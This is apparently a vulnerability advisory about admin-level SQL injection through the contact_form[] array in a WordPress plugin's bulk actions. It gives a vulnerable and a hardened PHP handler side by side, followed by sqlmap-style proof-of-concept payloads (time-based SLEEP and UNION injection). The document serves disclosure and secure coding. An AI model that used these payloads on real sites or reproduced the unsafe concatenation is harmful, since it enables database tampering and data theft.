The plugin did not properly sanitise the form_ids taken from the contact_form POST array parameter before using them in a SQL statement in the process_bulk_action() function. This could allow high-privilege users, such as admins, to perform SQL injection against the DBMS via the bulk actions delete, read and unread. Note: further SQL injections have been fixed in 1.2.5.7.
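The pattern described above is a bulk-action handler that builds an IN (...) clause from the contact_form[] POST array. The following is an added example written for this page, not the plugin's own code: it shows the unsafe concatenation next to a hardened process_bulk_action() that coerces every id to a positive integer and binds it through $wpdb->prepare(). The class name, the {prefix}example_forms table, its is_read column, the 'bulk-forms' nonce action and the manage_options capability are assumptions.

```php
<?php
// Added example (not the plugin's code). Runs inside WordPress, where $wpdb,
// absint(), check_admin_referer(), current_user_can() and sanitize_key() exist.
class Example_Forms_Table {

    // VULNERABLE pattern (illustrative only): the raw contact_form[] values are
    // imploded straight into the SQL string, so any non-numeric value in that
    // array becomes part of the query text.
    public function process_bulk_action_vulnerable() {
        global $wpdb;
        $ids = isset( $_POST['contact_form'] ) ? (array) $_POST['contact_form'] : array();
        if ( 'delete' === $this->current_action() && $ids ) {
            $wpdb->query( "DELETE FROM {$wpdb->prefix}example_forms WHERE id IN (" . implode( ',', $ids ) . ')' );
        }
    }

    // Hardened version: nonce and capability checks first, then every id is
    // reduced to an integer and bound with one %d placeholder per value.
    public function process_bulk_action() {
        global $wpdb;
        $action = $this->current_action();
        if ( ! in_array( $action, array( 'delete', 'read', 'unread' ), true ) ) {
            return;
        }
        check_admin_referer( 'bulk-forms' );             // nonce action name is assumed
        if ( ! current_user_can( 'manage_options' ) ) {   // capability is assumed
            wp_die( 'Insufficient permissions.' );
        }

        $ids = self::sanitize_ids( isset( $_POST['contact_form'] ) ? $_POST['contact_form'] : array() );
        if ( empty( $ids ) ) {
            return;
        }

        $table        = $wpdb->prefix . 'example_forms';   // table name is assumed
        $placeholders = implode( ',', array_fill( 0, count( $ids ), '%d' ) );

        switch ( $action ) {
            case 'delete':
                $sql = "DELETE FROM {$table} WHERE id IN ({$placeholders})";
                break;
            case 'read':
                $sql = "UPDATE {$table} SET is_read = 1 WHERE id IN ({$placeholders})";
                break;
            default: // 'unread'
                $sql = "UPDATE {$table} SET is_read = 0 WHERE id IN ({$placeholders})";
        }

        // $wpdb->prepare() accepts the values as a single array; each %d is
        // cast to an integer, so no user-controlled text reaches the statement.
        $wpdb->query( $wpdb->prepare( $sql, $ids ) );
    }

    // absint() turns every non-numeric or negative entry into 0; array_filter()
    // then drops those zeros, so only real, unique row ids remain.
    public static function sanitize_ids( $raw ) {
        $ids = array_map( 'absint', (array) $raw );
        return array_values( array_unique( array_filter( $ids ) ) );
    }

    // Mirrors WP_List_Table::current_action(): 'action' is the top dropdown,
    // 'action2' the bottom one; -1 means "no action selected".
    private function current_action() {
        foreach ( array( 'action', 'action2' ) as $key ) {
            if ( isset( $_REQUEST[ $key ] ) && '-1' !== $_REQUEST[ $key ] ) {
                return sanitize_key( $_REQUEST[ $key ] );
            }
        }
        return false;
    }
}
```

Two points are worth checking when reviewing a fix like this: every element of the array must be coerced (sanitising only the first element, or only the scalar case, leaves the array path open), and the number of placeholders must be generated from the sanitised array rather than the raw one so the argument count matches what prepare() expects.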
---
Parameter: #1* ((custom) POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: s=&_wpnonce=16a6b55ed1&contact_form[]=1 AND (SELECT 4559 FROM (SELECT(SLEEP(5)))BVdc)&action2=-1

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: s=&_wpnonce=16a6b55ed1&contact_form[]=1 UNION ALL SELECT NULL,NULL,CONCAT(0x717a7a7171,0x545942474c4e416e6864774d4c756c6f684d7569456150706b756f7a465a487173704c476b465243,0x71716b7871),NULL-- -&action2=-1
---
Yes
2021-01-21
2021-01-21
2021-01-25